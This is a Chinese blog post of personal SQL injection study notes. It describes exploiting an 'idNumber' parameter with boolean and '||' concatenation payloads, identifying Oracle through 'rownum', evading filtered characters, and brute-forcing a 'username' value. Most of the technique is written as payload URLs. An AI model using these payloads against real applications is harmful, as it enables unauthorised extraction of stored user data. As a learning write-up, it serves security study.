Sqli学习笔记系列---一次艰难的Sqli

简介: 正文这里记录一下一些小技巧: 替换 路径/参数在以下接口的的“idNumber”参数上找到注入点:/foo/?theName=YAP&idNumber=248001[注入点]识别是否执行成功true/false的payload/foo/?theName=YAP&idNumber=248001'+AND+'1'='1 TRUE/foo/?theName=YAP&idNumber=248001'+AND+'2'='1 FALSE也可以使用管道操作:

正文


这里记录一下一些小技巧: 替换 路径/参数

在以下接口的的“idNumber”参数上找到注入点:

/foo/?theName=YAP&idNumber=248001[注入点]

识别是否执行成功true/false的payload

/foo/?theName=YAP&idNumber=248001'+AND+'1'='1 TRUE

/foo/?theName=YAP&idNumber=248001'+AND+'2'='1 FALSE

也可以使用管道操作:

/foo/?theName=YAP&idNumber=248'||'001 TRUE
/foo/?theName=YAP&idNumber=24'||'8'||'001 TRUE
/foo/?theName=YAP&idNumber=24'||'X'||'001 FALSE

有了上面这些条件,就能够将此应用程序使用的数据库缩小到Oracle、PosgreSQL、IBM DB2或Informix。

尝试这个技巧:

/foo/?theName=YAP&idNumber=248'||<利用暴力破解来注入任何SQL函数>||'001

发现“rownum”被接受了,这表明是Oracle。为了确认,查询如下信息:

/foo/?theName=YAP&idNumber=24800'||rownum||'

发现如下信息:

有点意思,现在我们如何从注入中提取数据呢?应用程序似乎过滤/替换了以下字符

_ ( ) + . whitespaces

一种使用有效负载提取数据的方法如下:

/foo/?theName=YAP&idNumber=248'||<bruteforce all column_name here>||'001 - We found few column names which one of it was "username"

最后一步是:

/foo/?theName=YAP&idNumber=248001'and''||username||''like'<bruteforce-character>%

最后得出用户名.


总结


主要是要会利用暴力破解的方法来进行注入

目录
相关文章
|
7月前
|
SQL 安全 网络安全
[网络安全]sqli-labs Less-23 解题详析
[网络安全]sqli-labs Less-23 解题详析
100 0
|
7月前
|
SQL 安全 网络安全
[网络安全]sqli-labs Less-21 解题详析
[网络安全]sqli-labs Less-21 解题详析
171 0
|
6月前
|
数据安全/隐私保护
【less-3】sqli-labs靶场第三关
【less-3】sqli-labs靶场第三关
|
7月前
|
SQL PHP 数据库
Sqli-labs靶场搭建
本文章是在自己在使用新版phpstudy搭建靶场过程中遇到了很多问题,但在查询无果后,决定尝试旧版的phpstudy看能否成功,很幸运,成功了,也并不是网上的教程,说是php必须在5.2及以下.我使用的是5.4版本的.是对SQL注入进行一个简单的回归,然后就是对于自己在搭建靶场中所遇到的一些问题的解决办法,以及进行安装步骤的总结,对于自己的自主配置和独立解决问题的能力是一种培养
110 1
|
7月前
|
SQL 网络安全 数据库
[网络安全]sqli-labs Less-26a 解题详析
[网络安全]sqli-labs Less-26a 解题详析
96 0
|
7月前
|
SQL 网络安全
[网络安全]sqli-labs Less-25a 解题详析
[网络安全]sqli-labs Less-25a 解题详析
61 0
|
7月前
|
SQL 安全 数据库
SQLI-Labs通关笔记(1-5)
SQLI-Labs通关笔记(1-5)
73 0
|
7月前
|
SQL 关系型数据库 MySQL
【sqli靶场】第二关和第三关通关思路
【sqli靶场】第二关和第三关通关思路
97 0
|
7月前
|
安全 网络安全 数据安全/隐私保护
[网络安全]sqli-labs Less-20 解题详析
[网络安全]sqli-labs Less-20 解题详析
104 0
|
7月前
|
安全 网络安全 数据安全/隐私保护
[网络安全]sqli-labs Less-17 解题详析
[网络安全]sqli-labs Less-17 解题详析
104 0